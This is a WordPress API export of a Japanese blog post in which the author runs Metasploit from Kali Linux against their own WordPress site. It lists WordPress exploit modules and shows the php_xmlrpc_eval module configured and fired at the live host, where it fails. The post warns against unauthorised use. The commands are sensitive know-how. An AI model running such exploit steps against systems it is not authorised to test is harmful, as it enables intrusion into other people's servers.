{"id":3393,"date":"2020-01-01T00:33:24","date_gmt":"2019-12-31T15:33:24","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3393"},"modified":"2020-03-07T21:49:34","modified_gmt":"2020-03-07T12:49:34","slug":"metasploit%e3%82%92%e5%88%a9%e7%94%a8%e3%81%97%e3%81%a6%e3%80%81%e8%87%aa%e3%82%b5%e3%82%a4%e3%83%88%e3%82%92%e6%94%bb%e6%92%83%e3%81%97%e3%81%a6%e3%81%bf%e3%81%9f","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3393","title":{"rendered":"Metasploit\u3092\u5229\u7528\u3057\u3066\u3001\u81ea\u30b5\u30a4\u30c8\u3092\u653b\u6483\u3057\u3066\u307f\u305f"},"content":{"rendered":"

\u203b\u8a18\u4e8b\u5185\u5bb9\u3092\u81ea\u5206\u304c\u7ba1\u7406\u3057\u3066\u3044\u306a\u3044\u30b7\u30b9\u30c6\u30e0\u306b\u8a31\u53ef\u306a\u304f\u5b9f\u65bd\u3059\u308c\u3070\u9055\u6cd5\u3068\u306a\u308b\u305f\u3081\u3001\u7d76\u5bfe\u306b\u5b9f\u65bd\u3057\u306a\u3044\u3067\u304f\u3060\u3055\u3044\u203b
\nDocker for Windows \u3067 Kali Linux\u3092\u8d77\u52d5\u3057\u3066\u307f\u308b<\/a>\u5f8c\u306b\u64cd\u4f5c\u3057\u3066\u3044\u308b\u3002
\n\u653b\u6483\u3068\u3044\u3063\u3066\u3082\u5927\u3057\u305f\u3053\u3068\u306f\u3057\u3066\u304a\u3089\u305a\u3001xmlrpc\u3092\u653b\u6483\u3057\u3066\u307f\u305f\u3060\u3051\u3002<\/p>\n

\u4e8b\u524d\u6e96\u5099<\/h2>\n
\r\nPS C:\\Users\\shimizu> docker exec -it (\u30b3\u30f3\u30c6\u30caID) \/bin\/bash\r\n\r\nroot@81c581d5cf43:\/# apt-get update && apt-get -y upgrade && apt-get install -y kali-linux-web\r\n...(\u9069\u7528\u5f8c\u306b\u518d\u8d77\u52d5\u3059\u308b)\r\n\r\nroot@81c581d5cf43:\/# \/etc\/init.d\/postgresql start\r\nStarting PostgreSQL 12 database server: main.\r\n\r\nroot@81c581d5cf43:\/# update-rc.d postgresql enable\r\n\r\nroot@81c581d5cf43:\/# msfdb init\r\n...\r\n<\/pre>\n
Metasploit\u306e\u5b9f\u884c<\/h2>\n
\r\nroot@81c581d5cf43:\/# msfconsole\r\n\r\n               .;lxO0KXXXK0Oxl:.\r\n           ,o0WMMMMMMMMMMMMMMMMMMKd,\r\n        'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,\r\n      :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:\r\n    .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,\r\n   lWMMMMMMMMMMMXd:..     ..;dKMMMMMMMMMMMMo\r\n  xMMMMMMMMMMWd.               .oNMMMMMMMMMMk\r\n oMMMMMMMMMMx.                    dMMMMMMMMMMx\r\n.WMMMMMMMMM:                       :MMMMMMMMMM,\r\nxMMMMMMMMMo                         lMMMMMMMMMO\r\nNMMMMMMMMW                    ,cccccoMMMMMMMMMWlccccc;\r\nMMMMMMMMMX                     ;KMMMMMMMMMMMMMMMMMMX:\r\nNMMMMMMMMW.                      ;KMMMMMMMMMMMMMMX:\r\nxMMMMMMMMMd                        ,0MMMMMMMMMMK;\r\n.WMMMMMMMMMc                         'OMMMMMM0,\r\n lMMMMMMMMMMk.                         .kMMO'\r\n  dMMMMMMMMMMWd'                         ..\r\n   cWMMMMMMMMMMMNxc'.                ##########\r\n    .0MMMMMMMMMMMMMMMMWc            #+#    #+#\r\n      ;0MMMMMMMMMMMMMMMo.          +:+\r\n        .dNMMMMMMMMMMMMo          +#++:++#+\r\n           'oOWMMMMMMMMo                +:+\r\n               .,cdkO0K;        :+:    :+:\r\n                                :::::::+:\r\n                      Metasploit\r\n\r\n       =[ metasploit v5.0.66-dev                          ]\r\n+ -- --=[ 1956 exploits - 1092 auxiliary - 336 post       ]\r\n+ -- --=[ 558 payloads - 45 encoders - 10 nops            ]\r\n+ -- --=[ 7 evasion                                       ]\r\n<\/pre>\n
WordPress\u7528\u306eexploit\u3092\u691c\u7d22\u3059\u308b<\/h2>\n
\r\nmsf5 > search rank:excellent wordpress\r\n\r\nMatching Modules\r\n================\r\n\r\n   #   Name                                                           Disclosure Date  Rank       Check  Description\r\n   -   ----                                                           ---------------  ----       -----  -----------\r\n   0   exploit\/freebsd\/local\/rtld_execl_priv_esc                      2009-11-30       excellent  Yes    FreeBSD rtld execl() Privilege Escalation\r\n   1   exploit\/multi\/http\/wp_crop_rce                                 2019-02-19       excellent  Yes    WordPress Crop-image Shell Upload\r\n   2   exploit\/multi\/http\/wp_db_backup_rce                            2019-04-24       excellent  Yes    WP Database Backup RCE\r\n   3   exploit\/multi\/http\/wp_ninja_forms_unauthenticated_file_upload  2016-05-04       excellent  Yes    WordPress Ninja Forms Unauthenticated File Upload\r\n   4   exploit\/multi\/http\/wp_responsive_thumbnail_slider_upload       2015-08-28       excellent  Yes    WordPress Responsive Thumbnail Slider Arbitrary File Upload\r\n   5   exploit\/unix\/webapp\/joomla_akeeba_unserialize                  2014-09-29       excellent  Yes    Joomla Akeeba Kickstart Unserialize Remote Code Execution\r\n   6   exploit\/unix\/webapp\/jquery_file_upload                         2018-10-09       excellent  Yes    blueimp's jQuery (Arbitrary) File Upload\r\n   7   exploit\/unix\/webapp\/php_xmlrpc_eval                            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution\r\n   8   exploit\/unix\/webapp\/wp_admin_shell_upload                      2015-02-21       excellent  Yes    WordPress Admin Shell Upload\r\n   9   exploit\/unix\/webapp\/wp_advanced_custom_fields_exec             2012-11-14       excellent  Yes    WordPress Plugin Advanced Custom Fields Remote File Inclusion\r\n   10  exploit\/unix\/webapp\/wp_ajax_load_more_file_upload              2015-10-10       excellent  Yes    WordPress Ajax Load More PHP Upload Vulnerability\r\n   11  exploit\/unix\/webapp\/wp_asset_manager_upload_exec               2012-05-26       excellent  Yes    WordPress Asset-Manager PHP File Upload Vulnerability\r\n   12  exploit\/unix\/webapp\/wp_creativecontactform_file_upload         2014-10-22       excellent  Yes    WordPress Creative Contact Form Upload Vulnerability\r\n   13  exploit\/unix\/webapp\/wp_downloadmanager_upload                  2014-12-03       excellent  Yes    WordPress Download Manager (download-manager) Unauthenticated File Upload\r\n   14  exploit\/unix\/webapp\/wp_easycart_unrestricted_file_upload       2015-01-08       excellent  No     WordPress WP EasyCart Unrestricted File Upload\r\n   15  exploit\/unix\/webapp\/wp_foxypress_upload                        2012-06-05       excellent  Yes    WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution\r\n   16  exploit\/unix\/webapp\/wp_frontend_editor_file_upload             2012-07-04       excellent  Yes    WordPress Front-end Editor File Upload\r\n   17  exploit\/unix\/webapp\/wp_holding_pattern_file_upload             2015-02-11       excellent  Yes    WordPress Holding Pattern Theme Arbitrary File Upload\r\n   18  exploit\/unix\/webapp\/wp_inboundio_marketing_file_upload         2015-03-24       excellent  Yes    WordPress InBoundio Marketing PHP Upload Vulnerability\r\n   19  exploit\/unix\/webapp\/wp_infusionsoft_upload                     2014-09-25       excellent  Yes    WordPress InfusionSoft Upload Vulnerability\r\n   20  exploit\/unix\/webapp\/wp_lastpost_exec                           2005-08-09       excellent  No     WordPress cache_lastpostdate Arbitrary Code Execution\r\n   21  exploit\/unix\/webapp\/wp_mobile_detector_upload_execute          2016-05-31       excellent  Yes    WordPress WP Mobile Detector 3.5 Shell Upload\r\n   22  exploit\/unix\/webapp\/wp_nmediawebsite_file_upload               2015-04-12       excellent  Yes    WordPress N-Media Website Contact Form Upload Vulnerability\r\n   23  exploit\/unix\/webapp\/wp_optimizepress_upload                    2013-11-29       excellent  Yes    WordPress OptimizePress Theme File Upload Vulnerability\r\n   24  exploit\/unix\/webapp\/wp_photo_gallery_unrestricted_file_upload  2014-11-11       excellent  Yes    WordPress Photo Gallery Unrestricted File Upload\r\n   25  exploit\/unix\/webapp\/wp_pixabay_images_upload                   2015-01-19       excellent  Yes    WordPress Pixabay Images PHP Code Upload\r\n   26  exploit\/unix\/webapp\/wp_plainview_activity_monitor_rce          2018-08-26       excellent  Yes    WordPress Plainview Activity Monitor RCE\r\n   27  exploit\/unix\/webapp\/wp_platform_exec                           2015-01-21       excellent  No     WordPress Platform Theme File Upload Vulnerability\r\n   28  exploit\/unix\/webapp\/wp_property_upload_exec                    2012-03-26       excellent  Yes    WordPress WP-Property PHP File Upload Vulnerability\r\n   29  exploit\/unix\/webapp\/wp_reflexgallery_file_upload               2012-12-30       excellent  Yes    WordPress Reflex Gallery Upload Vulnerability\r\n   30  exploit\/unix\/webapp\/wp_revslider_upload_execute                2014-11-26       excellent  Yes    WordPress RevSlider File Upload and Execute Vulnerability\r\n   31  exploit\/unix\/webapp\/wp_slideshowgallery_upload                 2014-08-28       excellent  Yes    WordPress SlideShow Gallery Authenticated File Upload\r\n   32  exploit\/unix\/webapp\/wp_symposium_shell_upload                  2014-12-11       excellent  Yes    WordPress WP Symposium 14.11 Shell Upload\r\n   33  exploit\/unix\/webapp\/wp_total_cache_exec                        2013-04-17       excellent  Yes    WordPress W3 Total Cache PHP Code Execution\r\n   34  exploit\/unix\/webapp\/wp_worktheflow_upload                      2015-03-14       excellent  Yes    WordPress Work The Flow Upload Vulnerability\r\n   35  exploit\/unix\/webapp\/wp_wpshop_ecommerce_file_upload            2015-03-09       excellent  Yes    WordPress WPshop eCommerce Arbitrary File Upload Vulnerability\r\n   36  exploit\/unix\/webapp\/wp_wptouch_file_upload                     2014-07-14       excellent  Yes    WordPress WPTouch Authenticated File Upload\r\n   37  exploit\/unix\/webapp\/wp_wysija_newsletters_upload               2014-07-01       excellent  Yes    WordPress MailPoet Newsletters (wysija-newsletters) Unauthenticated File Upload\r\n   38  exploit\/windows\/fileformat\/ms12_005                            2012-01-10       excellent  No     MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability\r\n   39  exploit\/windows\/fileformat\/winrar_name_spoofing                2009-09-28       excellent  No     WinRAR Filename Spoofing\r\n<\/pre>\n
php_xmlrpc_eval\u3092\u9078\u629e\u3057\u3066\u3001\u60c5\u5831\u8868\u793a\u3059\u308b<\/h2>\n
\r\nmsf5 > use exploit\/unix\/webapp\/php_xmlrpc_eval\r\n\r\nmsf5 exploit(unix\/webapp\/php_xmlrpc_eval) > info\r\n\r\n       Name: PHP XML-RPC Arbitrary Code Execution\r\n     Module: exploit\/unix\/webapp\/php_xmlrpc_eval\r\n   Platform: Unix\r\n       Arch: cmd\r\n Privileged: No\r\n    License: Metasploit Framework License (BSD)\r\n       Rank: Excellent\r\n  Disclosed: 2005-06-29\r\n\r\nProvided by:\r\n  hdm <x@hdm.io>\r\n  cazz <bmc@shmoo.com>\r\n\r\nAvailable targets:\r\n  Id  Name\r\n  --  ----\r\n  0   Automatic\r\n\r\nCheck supported:\r\n  Yes\r\n\r\nBasic options:\r\n  Name     Current Setting  Required  Description\r\n  ----     ---------------  --------  -----------\r\n  PATH     \/xmlrpc.php      yes       Path to xmlrpc.php\r\n  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]\r\n  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'\r\n  RPORT    80               yes       The target port (TCP)\r\n  SSL      false            no        Negotiate SSL\/TLS for outgoing connections\r\n  VHOST                     no        HTTP server virtual host\r\n\r\nPayload information:\r\n  Space: 512\r\n\r\nDescription:\r\n  This module exploits an arbitrary code execution flaw discovered in\r\n  many implementations of the PHP XML-RPC module. This flaw is\r\n  exploitable through a number of PHP web applications, including but\r\n  not limited to Drupal, WordPress, Postnuke, and TikiWiki.\r\n\r\nReferences:\r\n  https:\/\/cvedetails.com\/cve\/CVE-2005-1921\/\r\n  OSVDB (17793)\r\n  http:\/\/www.securityfocus.com\/bid\/14088\r\n<\/pre>\n
\u30aa\u30d7\u30b7\u30e7\u30f3\u3092\u9078\u629e\u3057\u3066\u3001\u5b9f\u884c\u3059\u308b<\/h2>\n
\u4eca\u56de\u306eWordPress\u306b\u8106\u5f31\u6027\u306f\u306a\u3044\u305f\u3081\u3001exploit\u306f\u5931\u6557\u3059\u308b\u3002<\/p>\n
\r\nmsf5 exploit(unix\/webapp\/php_xmlrpc_eval) > set RHOSTS tech.akat.info\r\nRHOSTS => tech.akat.info\r\n\r\nmsf5 exploit(unix\/webapp\/php_xmlrpc_eval) > set RPORT 443\r\nRPORT => 443\r\n\r\nmsf5 exploit(unix\/webapp\/php_xmlrpc_eval) > set SSL true\r\nSSL => true\r\n\r\nmsf5 exploit(unix\/webapp\/php_xmlrpc_eval) > show options\r\n\r\nModule options (exploit\/unix\/webapp\/php_xmlrpc_eval):\r\n\r\n   Name     Current Setting  Required  Description\r\n   ----     ---------------  --------  -----------\r\n   PATH     \/xmlrpc.php      yes       Path to xmlrpc.php\r\n   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]\r\n   RHOSTS   tech.akat.info   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'\r\n   RPORT    443              yes       The target port (TCP)\r\n   SSL      true             no        Negotiate SSL\/TLS for outgoing connections\r\n   VHOST                     no        HTTP server virtual host\r\n\r\n\r\nExploit target:\r\n\r\n   Id  Name\r\n   --  ----\r\n   0   Automatic\r\n\r\n\r\nmsf5 exploit(unix\/webapp\/php_xmlrpc_eval) > exploit\r\n...\r\n[-] exploit failed: no response\r\n[*] Exploit completed, but no session was created.\r\n<\/pre>\n
\u88dc\u8db3-GUI\u3067Exploit\u60c5\u5831\u3092\u95b2\u89a7\u3059\u308b\u3053\u3068\u3082\u53ef\u80fd<\/h2>\n
https:\/\/www.exploit-db.com\/
\n\"\"<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
\u203b\u8a18\u4e8b\u5185\u5bb9\u3092\u81ea\u5206\u304c\u7ba1\u7406\u3057\u3066\u3044\u306a\u3044\u30b7\u30b9\u30c6\u30e0\u306b\u8a31\u53ef\u306a\u304f\u5b9f\u65bd\u3059\u308c\u3070\u9055\u6cd5\u3068\u306a\u308b\u305f\u3081\u3001\u7d76\u5bfe\u306b\u5b9f\u65bd\u3057\u306a\u3044\u3067\u304f\u3060\u3055\u3044\u203b Docker for Windows \u3067 Kali Linux\u3092\u8d77\u52d5\u3057\u3066\u307f\u308b\u5f8c\u306b\u64cd\u4f5c\u3057\u3066\u3044\u308b\u3002 \u653b\u6483\u3068\u3044\u3063\u3066\u3082\u5927\u3057 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3393"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3393"}],"version-history":[{"count":5,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3393\/revisions"}],"predecessor-version":[{"id":3507,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3393\/revisions\/3507"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3393"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3393"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3393"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}